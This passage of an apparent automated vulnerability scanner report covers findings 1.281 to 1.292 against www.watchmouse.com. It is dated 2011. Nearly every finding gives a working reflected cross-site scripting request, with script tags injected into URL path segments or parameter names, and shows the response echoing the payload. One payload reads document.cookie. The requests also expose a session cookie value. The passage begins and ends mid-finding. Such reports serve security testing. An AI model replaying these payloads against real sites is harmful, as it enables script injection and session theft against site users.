GET /fr/plans_price.php?921a1"><script>alert(1)</script>8cd8928a867=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:31 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-bc621a7923eeda7116213e0d493b6376"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/plans_price.php?921a1"><script>alert(1)</script>8cd8928a867=1" method="post">
...[SNIP]...

1.281. http://www.watchmouse.com/fr/register.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/register.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5250b"><script>alert(1)</script>2f139ca9dcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fr5250b"><script>alert(1)</script>2f139ca9dcd/register.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e410a2a627f3284430ee209709af2c3f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/fr5250b"><script>alert(1)</script>2f139ca9dcd/register.php" method="post">
...[SNIP]...

1.282. http://www.watchmouse.com/fr/register.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/register.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0af3"><script>alert(1)</script>5a821d50b04 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/register.phpf0af3"><script>alert(1)</script>5a821d50b04 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:07 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-8ab92156b782f5d2c1835cc2fbe34ded"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/register.phpf0af3"><script>alert(1)</script>5a821d50b04" method="post">
...[SNIP]...

1.283. http://www.watchmouse.com/fr/register.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/register.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ece51"><script>alert(1)</script>a00884a751f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/register.php?vpackid=35&ece51"><script>alert(1)</script>a00884a751f=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:09:09 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-611d7c2d27726a9826081e50484dfd62"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<a href="/en/register.php?vpackid=35&ece51"><script>alert(1)</script>a00884a751f=1" onclick="$('#lang-menu').toggle();">
...[SNIP]...

1.284. http://www.watchmouse.com/it/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 511d6"><script>alert(1)</script>4d9c68409ae was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1511d6"><script>alert(1)</script>4d9c68409ae HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:09:25 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-it-b9a94ab69743e5b71fa37291c075ed3c"
Content-Language: it
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/it/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1511d6"><script>alert(1)</script>4d9c68409ae" method="post">
...[SNIP]...

1.285. http://www.watchmouse.com/it/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2ba3"><script>alert(1)</script>03e526316f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /itf2ba3"><script>alert(1)</script>03e526316f/ HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:14 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-76ee19b28a5b3f597dfcbd2b2776b99b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/itf2ba3"><script>alert(1)</script>03e526316f/" method="post">
...[SNIP]...

1.286. http://www.watchmouse.com/it/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ee6a"><script>alert(1)</script>48690ceb28a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it/?7ee6a"><script>alert(1)</script>48690ceb28a=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:09:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-it-ff10bdaa89b60614ed28d19f67da7c95"
Content-Language: it
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/it/?7ee6a"><script>alert(1)</script>48690ceb28a=1" method="post">
...[SNIP]...

1.287. http://www.watchmouse.com/it/feature/public-status-page.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/feature/public-status-page.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8be22"><script>alert(1)</script>d14c70ea7fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /it8be22"><script>alert(1)</script>d14c70ea7fd/feature/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-c615ffe58b21da03f0e73df8f663bc28"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/it8be22"><script>alert(1)</script>d14c70ea7fd/feature/public-status-page.html" method="post">
...[SNIP]...

1.288. http://www.watchmouse.com/it/feature/public-status-page.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/feature/public-status-page.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbabe"><script>alert(1)</script>90596ac9e05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it/featuredbabe"><script>alert(1)</script>90596ac9e05/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-it-aeb9a875069c0782067304b0296f9124"
Content-Language: it
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/it/featuredbabe"><script>alert(1)</script>90596ac9e05/public-status-page.html" method="post">
...[SNIP]...

1.289. http://www.watchmouse.com/it/feature/public-status-page.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/feature/public-status-page.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12b9e"><script>alert(1)</script>7a54ab14dd5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it/feature/public-status-page.html12b9e"><script>alert(1)</script>7a54ab14dd5 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-it-aacb57b559a2af435d7fe37a2e30f73a"
Content-Language: it
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/it/feature/public-status-page.html12b9e"><script>alert(1)</script>7a54ab14dd5" method="post">
...[SNIP]...

1.290. http://www.watchmouse.com/it/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a947"><script>alert(1)</script>f7928c7179e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /it2a947"><script>alert(1)</script>f7928c7179e/feature/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e4998840e743c41536c4bd9cb540e2f3"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/it2a947"><script>alert(1)</script>f7928c7179e/feature/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.291. http://www.watchmouse.com/it/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b95d4"><script>alert(1)</script>edd65b60410 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it/featureb95d4"><script>alert(1)</script>edd65b60410/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:34 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-it-73ac59ae4e7fd2c9a81abd21006e5623"
Content-Language: it
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/it/featureb95d4"><script>alert(1)</script>edd65b60410/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.292. http://www.watchmouse.com/it/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd42"><script>alert(1)</script>8f8a5b6cf20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it/feature/transaction-monitoring-web-application-testing.htmlfbd42"><script>alert(1)</script>8f8a5b6cf20 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128